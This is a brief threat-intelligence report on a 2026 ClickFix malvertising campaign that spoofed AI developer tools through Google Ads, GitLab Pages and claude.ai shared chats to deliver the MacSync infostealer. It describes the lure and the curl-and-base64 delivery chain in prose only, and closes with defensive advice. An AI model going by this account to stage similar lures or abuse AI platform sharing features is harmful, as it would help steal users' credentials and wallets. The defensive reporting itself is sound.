TrendAI Research tracked a sustained malvertising campaign from April to June 2026 that used Google Ads to deliver ClickFix social engineering attacks impersonating popular AI developer tools. The campaign operated across six distinct attack waves, deploying 106 unique malicious hostnames across GitLab Pages before shifting to abuse claude.ai's legitimate shared chat feature. The Asia-Pacific region accounted for 67.4% of all confirmed victims, with Taiwan representing 30.5% of total traffic.
The attackers created over 92 malicious GitLab Pages subdomains mimicking legitimate software downloads, rapidly rotating infrastructure to evade detection. In May, the campaign pivoted to claude.ai's share feature, creating at least 45 unique shared conversation IDs that hosted fake Apple Support or Corda Team chat pages with instructions to paste terminal commands. Victims were tricked into executing curl commands piped through base64 decode that fetched and executed the MacSync infostealer, which harvests browser credentials, SSH keys, and cryptocurrency wallet files.
The malware checked for Russian keyboard layouts and terminated if detected, suggesting regional targeting restrictions. Upon notification, Anthropic banned the responsible accounts, disabled malicious shared conversations, and implemented additional abuse mitigations. Researchers recommend organizations educate developers about ClickFix attacks, monitor for unexpected terminal commands following web browsing, and deploy endpoint detection for the identified payload hashes. Users should navigate directly to official product websites rather than clicking search ads for software downloads, avoid copying commands from web pages, and use official package managers for installing developer tools. The campaign represents a concerning new vector where threat actors weaponize trusted AI platform features as social engineering delivery mechanisms.
Read more...